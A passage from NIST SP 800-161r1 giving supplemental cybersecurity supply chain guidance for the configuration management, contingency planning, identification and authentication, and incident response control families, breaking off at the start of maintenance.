exposure to cybersecurity risks throughout the supply chain.
Level(s): 3
(5)
SYSTEM COMPONENT INVENTORY | CENTRALIZED REPOSITORY
Supplemental C-SCRM Guidance: Enterprises may choose to implement centralized inventories that
include components from all enterprise information systems, networks, and their components.
Centralized repositories of inventories provide opportunities for efficiencies in accounting for
information systems, networks, and their components. Such repositories may also help enterprises
rapidly identify the location and responsible individuals of components that have been compromised,
breached, or are otherwise in need of mitigation actions. The enterprise should ensure that centralized
inventories include the supply chain-specific information required for proper component accountability
(e.g., supply chain relevance and information system, network, or component owner).
Level(s): 3
(6)
SYSTEM COMPONENT INVENTORY | AUTOMATED LOCATION TRACKING
Supplemental C-SCRM Guidance: When employing automated mechanisms for tracking information
system components by physical location, the enterprise should incorporate information system,
network, and component tracking needs to ensure accurate inventory.
Level(s): 2, 3
(7)
SYSTEM COMPONENT INVENTORY | ASSIGNMENT OF COMPONENTS TO SYSTEMS
Supplemental C-SCRM Guidance: When assigning components to systems, the enterprise should
ensure that the information systems and networks with all relevant components are inventoried,
marked, and properly assigned. This facilitates quick inventory of all components relevant to
information systems and networks and enables tracking of components that are considered critical and
require differentiating treatment as part of the information system and network protection activities.
Level(s): 3
(8)
SYSTEM COMPONENT INVENTORY | SBOMS FOR OPEN SOURCE PROJECTS
Supplemental C-SCRM Guidance: If an enterprise uses an open source project that does not have an
SBOM and the enterprise requires one, the enterprise will need to 1) contribute SBOM generation to
the open source project, 2) contribute resources to the project to add this capability, or 3) generate an
SBOM on their first consumption of each version of the open source project that they use.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
94
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
CM-9
CONFIGURATION MANAGEMENT PLAN
Supplemental C-SCRM Guidance: Enterprises should ensure that C-SCRM is incorporated into
configuration management planning activities. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2, 3
Control Enhancement(s):
(1)
CONFIGURATION MANAGEMENT PLAN | ASSIGNMENT OF RESPONSIBILITY
Supplemental C-SCRM Guidance: Enterprises should ensure that all relevant roles are defined to
address configuration management activities for information systems and networks. Enterprises should
ensure that requirements and capabilities for configuration management are appropriately addressed or
included in the following supply chain activities: requirements definition, development, testing, market
research and analysis, procurement solicitations and contracts, component installation or removal,
system integration, operations, and maintenance.
Level(s): 2, 3
CM-10 SOFTWARE USAGE RESTRICTIONS
Supplemental C-SCRM Guidance: Enterprises should ensure that licenses for software used within their
information systems and networks are documented, tracked, and maintained. Tracking mechanisms should
provide for the ability to trace users and the use of licenses to access control information and processes. As
an example, when an employee is terminated, a “named user” license should be revoked, and the license
documentation should be updated to reflect this change. Departments and agencies should refer to
Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1)
SOFTWARE USAGE RESTRICTIONS | OPEN SOURCE SOFTWARE
Supplemental C-SCRM Guidance: When considering software, enterprises should review all options
and corresponding risks, including open source or commercially licensed components. When using
open source software (OSS), the enterprise should understand and review the open source
community’s typical procedures regarding provenance, configuration management, sources, binaries,
reusable frameworks, reusable libraries’ availability for testing and use, and any other information that
may impact levels of exposure to cybersecurity risks throughout the supply chain. Numerous open
source solutions are currently in use by enterprises, including in integrated development environments
(IDEs) and web servers. The enterprise should:
a.
Track the use of OSS and associated documentation,
b. Ensure that the use of OSS adheres to the licensing terms and that these terms are acceptable to the
enterprise,
c.
Document and monitor the distribution of software as it relates to the licensing agreement to
control copying and distribution, and
d. Evaluate and periodically audit the OSS’s supply chain as provided by the open source developer
(e.g., information regarding provenance, configuration management, use of reusable libraries,
etc.). This evaluation can be done through obtaining existing and often public documents, as well
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
95
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
as using experience based on software update and download processes in which the enterprise may
have participated.
Level(s): 2, 3
CM-11 USER-INSTALLED SOFTWARE
Supplemental C-SCRM Guidance: This control extends to the enterprise information system and network
users who are not employed by the enterprise. These users may be suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers.
Level(s): 2, 3
CM-12 INFORMATION LOCATION
Supplemental C-SCRM Guidance: Information that resides in different physical locations may be subject to
different cybersecurity risks throughout the supply chain, depending on the specific location of the
information. Components that originate or operate from different physical locations may also be subject to
different supply chain risks, depending on the specific location of origination or operations. Enterprises
should manage these risks through limiting access control and specifying allowable or disallowable
geographic locations for backup/recovery, patching/upgrades, and information transfer/sharing. NIST SP
800-53, Rev. 5 control enhancement CM-12 (1) is a mechanism that can be used to enable automated
location of components.
Level(s): 2, 3
Control Enhancement(s):
(1)
INFORMATION LOCATION | AUTOMATED TOOLS TO SUPPORT INFORMATION LOCATION
Use automated tools to identify enterprise-defined information on enterprise-defined system
components to ensure that controls are in place to protect enterprise information and individual
privacy.
Level(s): 2, 3
CM-13 DATA ACTION MAPPING
Supplemental C-SCRM Guidance: In addition to personally identifiable information, understanding and
documenting a map of system data actions for sensitive or classified information is necessary. Data action
mapping should also be conducted to map Internet of Things (IoT) devices, embedded or stand-alone IoT
systems, or IoT system of system data actions. Understanding what classified or IoT information is being
processed, its sensitivity and/or effect on a physical thing or physical environment, how the sensitive or IoT
information is being processed (e.g., if the data action is visible to an individual or is processed in another
part of the system), and by whom provides a number of contextual factors that are important for assessing
the degree of risk. Data maps can be illustrated in different ways, and the level of detail may vary based on
the mission and business needs of the enterprise. The data map may be an overlay of any system design
artifact that the enterprise is using. The development of this map may necessitate coordination between
program and security personnel regarding the covered data actions and the components that are identified
as part of the system.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
96
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
CM-14 SIGNED COMPONENTS
Supplemental C-SCRM Guidance: Enterprises should verify that the acquired hardware and software
components are genuine and valid by using digitally signed components from trusted certificate authorities.
Verifying components before allowing installation helps enterprises reduce cybersecurity risks throughout
the supply chain.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
97
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: CONTINGENCY PLANNING
[FIPS 200] specifies the Contingency Planning minimum security requirement as follows:
Organizations must establish, maintain, and effectively implement plans for emergency
response, backup operations, and post-disaster recovery for organizational information
systems to ensure the availability of critical information resources and continuity of
operations in emergency situations.
Cybersecurity supply chain contingency planning includes planning for alternative suppliers of
system components, alternative suppliers of systems and services, alternative delivery routes for
critical system components, and denial-of-service attacks on the supply chain. Such contingency
plans help ensure that existing service providers have an effective continuity of operations plan,
especially when the provider is delivering services in support of a critical mission function.
Additionally, many techniques used for contingency planning, such as alternative processing
sites, have their own supply chains with their own attendant cybersecurity risks. Enterprises
should ensure that they understand and manage cybersecurity risks throughout the supply chain
and dependencies related to the contingency planning activities as necessary.
CP-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should integrate C-SCRM into the contingency planning
policy and related SCRM Strategy/Implementation Plan, policies, and SCRM Plan. The policy should
cover information systems and the supply chain network and, at a minimum, address scenarios such as:
a.
Unplanned component failure and subsequent replacement;
b. Planned replacement related to feature improvements, maintenance, upgrades, and modernization;
and
c.
Product and/or service disruption.
Level(s): 1, 2, 3
CP-2
CONTINGENCY PLAN
Supplemental C-SCRM Guidance: Enterprises should define and implement a contingency plan for the
supply chain information systems and network to ensure that preparations are in place to mitigate the loss
or degradation of data or operations. Contingencies should be put in place for the supply chain, network,
information systems (especially critical components), and processes to ensure protection against
compromise and provide appropriate failover and timely recovery to an acceptable state of operations.
Level(s): 2, 3
Control Enhancement(s):
(1)
CONTINGENCY PLAN | COORDINATE WITH RELATED PLANS
Supplemental C-SCRM Guidance: Coordinate contingency plan development for supply chain risks
with enterprise elements responsible for related plans.
Level(S): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
98
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
(2)
CONTINGENCY PLAN | CAPACITY PLANNING
Supplemental C-SCRM Guidance: This enhancement helps the availability of the supply chain
network or information system components.
Level(s): 2, 3
(3)
CONTINGENCY PLAN | COORDINATE WITH EXTERNAL SERVICE PROVIDERS
Supplemental C-SCRM Guidance: Enterprises should ensure that the supply chain network,
information systems, and components provided by an external service provider have appropriate
failover (to include personnel, equipment, and network resources) to reduce or prevent service
interruption or ensure timely recovery. Enterprises should ensure that contingency planning
requirements are defined as part of the service-level agreement. The agreement may have specific
terms that address critical components and functionality support in case of denial-of-service attacks to
ensure the continuity of operations. Enterprises should coordinate with external service providers to
identify service providers’ existing contingency plan practices and build on them as required by the
enterprise’s mission and business needs. Such coordination will aid in cost reduction and efficient
implementation. Enterprises should require their prime contractors who provide a mission- and
business-critical or -enabling service or product to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 3
(4)
CONTINGENCY PLAN | IDENTIFY CRITICAL ASSETS
Supplemental C-SCRM Guidance: Ensure that critical assets (including hardware, software, and
personnel) are identified and that appropriate contingency planning requirements are defined and
applied to ensure the continuity of operations. A key step in this process is to complete a criticality
analysis on components, functions, and processes to identify all critical assets. See Section 2 and
NISTIR 8179 for additional guidance on criticality analyses.
Level(s): 3
CP-3
CONTINGENCY TRAINING
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in
contingency training. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1)
CONTINGENCY TRAINING | SIMULATED EVENTS
Supplemental C-SCRM Guidance: Enterprises should ensure that suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers who have
roles and responsibilities in providing critical services are included in contingency training exercises.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
99
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
CP-4
CONTINGENCY PLAN TESTING
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in
contingency testing. The enterprise – in coordination with the service provider(s) – should test
continuity/resiliency capabilities, such as failover from a primary production site to a back-up site. This
testing may occur separately from a training exercise or be performed during the exercise. Enterprises
should reference their C-SCRM threat assessment output to develop scenarios to test how well the
enterprise is able to withstand and/or recover from a C-SCRM threat event.
Level(s): 2, 3
CP-6
ALTERNATIVE STORAGE SITE
Supplemental C-SCRM Guidance: When managed by suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers, alternative storage sites are
considered within an enterprise’s supply chain network. Enterprises should apply appropriate cybersecurity
supply chain controls to those storage sites.
Level(s): 2, 3
Control Enhancement(s):
(1)
ALTERNATIVE STORAGE SITE | SEPARATION FROM PRIMARY SITE
Supplemental C-SCRM Guidance: This enhancement helps the resiliency of the supply chain network,
information systems, and information system components.
Level(s): 2, 3
CP-7
ALTERNATIVE PROCESSING SITE
Supplemental C-SCRM Guidance: When managed by suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers, alternative storage sites are
considered within an enterprise’s supply chain. Enterprises should apply appropriate supply chain
cybersecurity controls to those processing sites.
Level(s): 2, 3
CP-8
TELECOMMUNICATIONS SERVICES
Supplemental C-SCRM Guidance: Enterprises should incorporate alternative telecommunication service
providers for their supply chain to support critical information systems.
Level(s): 2, 3
Control Enhancement(s):
(1)
TELECOMMUNICATIONS SERVICES | SEPARATION OF PRIMARY AND ALTERNATIVE PROVIDERS
Supplemental C-SCRM Guidance: The separation of primary and alternative providers supports
cybersecurity resilience of the supply chain.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
100
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
(2)
TELECOMMUNICATIONS SERVICES | PROVIDER CONTINGENCY PLAN
Supplemental C-SCRM Guidance: For C-SCRM, suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers, contingency plans should
provide separation in infrastructure, service, process, and personnel, where appropriate.
Level(s): 2, 3
CP-11 ALTERNATIVE COMMUNICATIONS PROTOCOLS
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in
contingency plans, training, and testing as part of incorporating alternative communications protocol
capabilities to establish supply chain resilience.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
101
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: IDENTIFICATION AND AUTHENTICATION
[FIPS 200] specifies the Identification and Authentication minimum security requirement as
follows:
Organizations must identify information system users, processes acting on behalf of
users, or devices and authenticate (or verify) the identities of those users, processes, or
devices, as a prerequisite to allowing access to organizational information systems.
NIST SP 800-161, Supply Chain Risk Management Practices for Federal Information Systems
and Organizations, expands the [FIPS 200] identification and authentication control family to
include the identification and authentication of components in addition to individuals (users) and
processes acting on behalf of individuals within the supply chain network. Identification and
authentication are critical to C-SCRM because they provide for the traceability of individuals,
processes acting on behalf of individuals, and specific systems/components in an enterprise’s
supply chain network. Identification and authentication are required to appropriately manage
cybersecurity risks throughout the supply chain to both reduce the risk of supply chain
cybersecurity compromise and to generate evidence in case of supply chain cybersecurity
compromise.
IA-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The enterprise should – at enterprise-defined intervals – review,
enhance, and update their identity and access management policies and procedures to ensure that critical
roles and processes within the supply chain network are defined and that the enterprise’s critical systems,
components, and processes are identified for traceability. This should include the identity of critical
components that may not have been considered under identification and authentication in the past. Note
that providing identification for all items within the supply chain would be cost-prohibitive, and discretion
should be used. The enterprise should update related C-SCRM Strategy/Implementation Plan(s), Policies,
and C-SCRM Plans.
Level(s): 1, 2, 3
IA-2
IDENTIFICATION AND AUTHENTICATION (ORGANIZATIONAL USERS)
Supplemental C-SCRM Guidance: Enterprises should ensure that identification and requirements are
defined and applied for enterprise users accessing an ICT/OT system or supply chain network. An
enterprise user may include employees, individuals deemed to have the equivalent status of employees
(e.g., contractors, guest researchers, etc.), and system integrators fulfilling contractor roles. Criteria such as
“duration in role” can aid in defining which identification and authentication mechanisms are used. The
enterprise may choose to define a set of roles and associate a level of authorization to ensure proper
implementation. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 1, 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
102
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
IA-3
DEVICE IDENTIFICATION AND AUTHENTICATION
Supplemental C-SCRM Guidance: Enterprises should implement capabilities to distinctly and positively
identify devices and software within their supply chain and, once identified, verify that the identity is
authentic. Devices that require unique device-to-device identification and authentication should be defined
by type, device, or a combination of type and device. Software that requires authentication should be
identified through a software identification tag (SWID) that enables verification of the software package
and authentication of the enterprise releasing the software package.
Level(s): 1, 2, 3
IA-4
IDENTIFIER MANAGEMENT
Supplemental C-SCRM Guidance: Identifiers allow for greater discoverability and traceability. Within the
enterprise’s supply chain, identifiers should be assigned to systems, individuals, documentation, devices,
and components. In some cases, identifiers may be maintained throughout a system’s life cycle – from
concept to retirement – but, at a minimum, throughout the system’s life within the enterprise.
For software development, identifiers should be assigned for those components that have achieved
configuration item recognition. For devices and operational systems, identifiers should be assigned when
the items enter the enterprise’s supply chain, such as when they are transferred to the enterprise’s
ownership or control through shipping and receiving or via download.
Suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers typically use their own identifiers for tracking purposes within their own supply chain.
Enterprises should correlate those identifiers with the enterprise-assigned identifiers for traceability and
accountability. Enterprises should require their prime contractors to implement this control and flow down
this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Related Controls: IA-3 (1), IA-3 (2), IA-3 (3), and IA-3 (4)
Control Enhancement(s):
(1)
IDENTIFIER MANAGEMENT | CROSS-ORGANIZATION MANAGEMENT
Supplemental C-SCRM Guidance: This enhancement helps the traceability and provenance of
elements within the supply chain through the coordination of identifier management among the
enterprise and its suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers. This includes information systems and components as well as
individuals engaged in supply chain activities.
Level(s): 1, 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
103
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
IA-5
AUTHENTICATOR MANAGEMENT
Supplemental C-SCRM Guidance: This control facilitates traceability and non-repudiation throughout the
supply chain. Enterprises should require their prime contractors to implement this control and flow down
this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
(1)
AUTHENTICATOR MANAGEMENT | CHANGE AUTHENTICATORS PRIOR TO DELIVERY
Supplemental C-SCRM Guidance: This enhancement verifies the chain of custody within the
enterprise’s supply chain.
Level(s): 3
(2) AUTHENTICATOR MANAGEMENT | FEDERATED CREDENTIAL MANAGEMENT
Supplemental C-SCRM Guidance: This enhancement facilitates provenance and chain of custody
within the enterprise’s supply chain.
Level(s): 3
IA-8
IDENTIFICATION AND AUTHENTICATION (NON-ORGANIZATIONAL USERS)
Supplemental C-SCRM Guidance: Suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers have the potential to engage the enterprise’s supply
chain for service delivery (e.g., development/integration services, product support, etc.). Enterprises should
manage the establishment, auditing, use, and revocation of identification credentials and the authentication
of non-enterprise users within the supply chain. Enterprises should also ensure promptness in performing
identification and authentication activities, especially in the case of revocation management, to help
mitigate exposure to cybersecurity risks throughout the supply chain such as those that arise due to insider
threats.
Level(s): 2, 3
IA-9
SERVICE IDENTIFICATION AND AUTHENTICATION
Supplemental C-SCRM Guidance: Enterprises should ensure that identification and authentication are
defined and managed for access to services (e.g., web applications using digital certificates, services or
applications that query a database as opposed to labor services) throughout the supply chain. Enterprises
should ensure that they know what services are being procured and from whom. Services procured should
be listed on a validated list of services for the enterprise or have compensating controls in place.
Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
104
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: INCIDENT RESPONSE
[FIPS 200] specifies the Incident Response minimum security requirement as follows:
Organizations must: (i) establish an operational incident handling capability for
organizational information systems that includes adequate preparation, detection,
analysis, containment, recovery, and user response activities; and (ii) track, document,
and report incidents to appropriate organizational officials and/or authorities.
Supply chain compromises may span suppliers, developers, system integrators, external system
service providers, and other ICT/OT-related service providers. Enterprises should ensure that
their incident response controls address C-SCRM including what, when, and how information
about incidents will be reported or shared by, with, or between suppliers, developers, system
integrators, external system service providers, other ICT/OT-related service providers, and any
relevant interagency bodies. Incident response will help determine whether an incident is related
to the supply chain.
IR-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should integrate C-SCRM into incident response policy and
procedures, and related C-SCRM Strategy/Implementation Plans and Policies. The policy and procedures
must provide direction for how to address supply chain-related incidents and cybersecurity incidents that
may complicate or impact the supply chain. Individuals who work within specific mission and system
environments need to recognize cybersecurity supply chain-related incidents. The incident response policy
should state when and how threats and incidents should be handled, reported, and managed.
Additionally, the policy should define when, how, and with whom to communicate to the FASC (Federal
Acquisition Security Council) and other stakeholders or partners within the broader supply chain in the
event of a cyber threat or incident. Departments and agencies must notify the FASC of supply chain risk
information when the FASC requests information relating to a particular source, covered article, or
procures or an executive agency has determined that there is a reasonable basis to conclude a substantial
supply chain risk associated with a source, covered procurement, or covered article exists. In such
instances, the executive agency shall provide the FASC with relevant information concerning the source or
covered article, including 1) the supply chain risk information identified through the course of the agency’s
activities in furtherance of mitigating, identifying, or managing its supply chain risk and 2) the supply chain
risk information regarding covered procurement actions by the agency under the Federal Acquisition
Supply Chain Security Act of 2018 (FASCSA) 41 U.S.C. § 4713; and any orders issued by the agency
under 41 U.S.C. § 4713.
Bidirectional communication with supply chain partners should be defined in agreements with suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers to inform all involved parties of a supply chain cybersecurity incident. Incident information may
also be shared with enterprises such as the Federal Bureau of Investigation (FBI), US CERT (United States
Computer Emergency Readiness Team), and the NCCIC (National Cybersecurity and Communications
Integration Center) as appropriate. Depending on the severity of the incident, the need for accelerated
communications up and down the supply chain may be necessary. Appropriate agreements should be put in
place with suppliers, developers, system integrators, external system service providers, and other ICT/OT-
related service providers to ensure speed of communication, response, corrective actions, and other related
activities. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
105
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
In Level 2 and Level 3, procedures and enterprise-specific incident response methods must be in place,
training completed (consider including Operations Security [OPSEC] and any appropriate threat briefing in
training), and coordinated communication established throughout the supply chain to ensure an efficient
and coordinated incident response effort.
Level(s): 1, 2, 3
Control Enhancement(s):
(1)
POLICY AND PROCEDURES | C-SCRM INCIDENT INFORMATION SHARING
Enterprises should ensure that their incident response policies and procedures provide guidance on
effective information sharing of incidents and other key risk indicators in the supply chain. Guidance
should – at a minimum – cover the collection, synthesis, and distribution of incident information from
a diverse set of data sources, such as public data repositories, paid subscription services, and in-house
threat intelligence teams.
Enterprises that operate in the public sector should include specific guidance on when and how to
communicate with interagency partnerships, such as the FASC (Federal Acquisition Security Council)
and other stakeholders or partners within the broader supply chain, in the event of a cyber threat or
incident.
Departments and agencies must notify the FASC of supply chain risk information when:
1) The FASC requests information relating to a particular source or covered article, or
2) An executive agency has determined that there is a reasonable basis to conclude that a
substantial supply chain risk associated with a source, covered procurement, or covered article
exists.
In such instances, the executive agency shall provide the FASC with relevant information concerning
the source or covered article, including:
1) Supply chain risk information identified through the course of the agency’s activities in
furtherance of mitigating, identifying, or managing its supply chain risk and
2) Supply chain risk information regarding covered procurement actions by the agency under the
Federal Acquisition Supply Chain Security Act of 2018 (FASCSA) 41 U.S.C. § 4713; and
any orders issued by the agency under 41 U.S.C. § 4713.
Level(s): 1, 2, 3
IR-2
INCIDENT RESPONSE TRAINING
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in incident
response training. Enterprises should require their prime contractors to implement this control and flow
down this requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix
F to implement this guidance in accordance with Executive Order 14028, Improving the Nation’s
Cybersecurity.
Level(s): 2, 3
IR-3
INCIDENT RESPONSE TESTING
Supplemental C-SCRM Guidance: Enterprises should ensure that critical suppliers are included in and/or
provided with incident response testing.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
106
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level(s): 2, 3
IR-4
INCIDENT HANDLING
Supplemental C-SCRM Guidance: Suspected cybersecurity supply chain events that may trigger an
organization’s C-SCRM incident handling processes. Refer to Appendix G: Task 3.4 for examples of
supply chain events. C-SCRM-specific supplemental guidance is provided in control enhancements.
Level(s): 1, 2, 3
Control Enhancement(s):
(1)
INCIDENT HANDLING | INSIDER THREATS
Supplemental C-SCRM Guidance: This enhancement helps limit exposure of the C-SCRM information
systems, networks, and processes to insider threats. Enterprises should ensure that insider threat
incident handling capabilities account for the potential of insider threats associated with suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers’ personnel with access to ICT/OT systems within the authorization boundary.
Level(s): 1, 2, 3
(2)
INCIDENT HANDLING | INSIDER THREATS – INTRA-ORGANIZATION
Supplemental C-SCRM Guidance: This enhancement helps limit the exposure of C-SCRM information
systems, networks, and processes to insider threats. Enterprises should ensure that insider threat
coordination includes suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers.
Level(s): 1, 2, 3
(3)
INCIDENT HANDLING | SUPPLY CHAIN COORDINATION
Supplemental C-SCRM Guidance: A number of enterprises may be involved in managing incidents
and responses for supply chain security. After initially processing the incident and deciding on a course
of action (in some cases, the action may be “no action”), the enterprise may need to coordinate with
their suppliers, developers, system integrators, external system service providers, other ICT/OT-related
service providers, and any relevant interagency bodies to facilitate communications, incident response,
root cause, and corrective actions. Enterprises should securely share information through a coordinated
set of personnel in key roles to allow for a more comprehensive incident handling approach. Selecting
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers with mature capabilities for supporting supply chain cybersecurity incident handling
is important for reducing exposure to cybersecurity risks throughout the supply chain. If transparency
for incident handling is limited due to the nature of the relationship, define a set of acceptable criteria
in the agreement (e.g., contract). A review (and potential revision) of the agreement is recommended,
based on the lessons learned from previous incidents. Enterprises should require their prime
contractors to implement this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 2
(4)
INCIDENT HANDLING | INTEGRATED INCIDENT RESPONSE TEAM
Supplemental C-SCRM Guidance: An enterprise should include a forensics team and/or capability as
part of an integrated incident response team for supply chain incidents. Where relevant and practical,
integrated incident response teams should also include necessary geographical representation as well as
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
107
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
Level(s): 3
IR-5
INCIDENT MONITORING
Supplemental C-SCRM Guidance: Enterprises should ensure that agreements with suppliers include
requirements to track and document incidents, response decisions, and activities.
Level(s): 2, 3
IR-6
INCIDENT REPORTING
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance provided in control
enhancement IR-6 (3).
Level(s): 3
Control Enhancement(s):
(1)
INCIDENT REPORTING | SUPPLY CHAIN COORDINATION
Supplemental C-SCRM Guidance: Communications of security incident information from the
enterprise to suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers and vice versa require protection. The enterprise should ensure that
information is reviewed and approved for sending based on its agreements with suppliers and any
relevant interagency bodies. Any escalation of or exception from this reporting should be clearly
defined in the agreement. The enterprise should ensure that incident reporting data is adequately
protected for transmission and received by approved individuals only. Enterprises should require their
prime contractors to implement this control and flow down this requirement to relevant sub-tier
contractors.
Level(s): 3
IR-7
INCIDENT RESPONSE ASSISTANCE
Supplemental C-SCRM Guidance: C-SCRM-specific supplemental guidance provided in control
enhancement IR-7 (2).
Level(s): 3
Control Enhancement(s):
(1)
INCIDENT RESPONSE ASSISTANCE | COORDINATION WITH EXTERNAL PROVIDERS
Supplemental C-SCRM Guidance: The enterprise’s agreements with prime contractors should specify
the conditions under which a government-approved or -designated third party would be available or
may be required to provide assistance with incident response, as well as the role and responsibility of
that third party.
Level(s): 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
108
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
IR-8
INCIDENT RESPONSE PLAN
Supplemental C-SCRM Guidance: Enterprises should coordinate, develop, and implement an incident
response plan that includes information-sharing responsibilities with critical suppliers and, in a federal
context, interagency partners and the FASC. Enterprises should require their prime contractors to
implement this control and flow down this requirement to relevant sub-tier contractors.
Related Control(s): IR-10
Level(s): 2, 3
IR-9
INFORMATION SPILLAGE RESPONSE
Supplemental C-SCRM Guidance: The supply chain is vulnerable to information spillage. The enterprise
should include supply chain-related information spills in its information spillage response plan. This may
require coordination with suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers. The details of how this coordination is to be conducted should be
included in the agreement (e.g., contract). Enterprises should require their prime contractors to implement
this control and flow down this requirement to relevant sub-tier contractors.
Level(s): 3
Related Controls: SA-4
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
109
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: MAINTENANCE
[FIPS 200] specifies the Maintenance minimum security requirement as follows:
Organizations must: (i) perform periodic and timely maintenance on organizational
information systems; and (ii) provide effective controls on the tools, techniques,
mechanisms, and personnel used to conduct information system maintenance.
Maintenance is frequently performed by an entity that is separate from the enterprise. As such,
maintenance becomes part of the supply chain. Maintenance includes performing updates and
replacements. C-SCRM should be applied to maintenance situations, including assessing
exposure to cybersecurity risks throughout the supply chain, selecting C-SCRM controls,
implementing those controls, and monitoring them for effectiveness.
MA-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should ensure that C-SCRM is included in maintenance
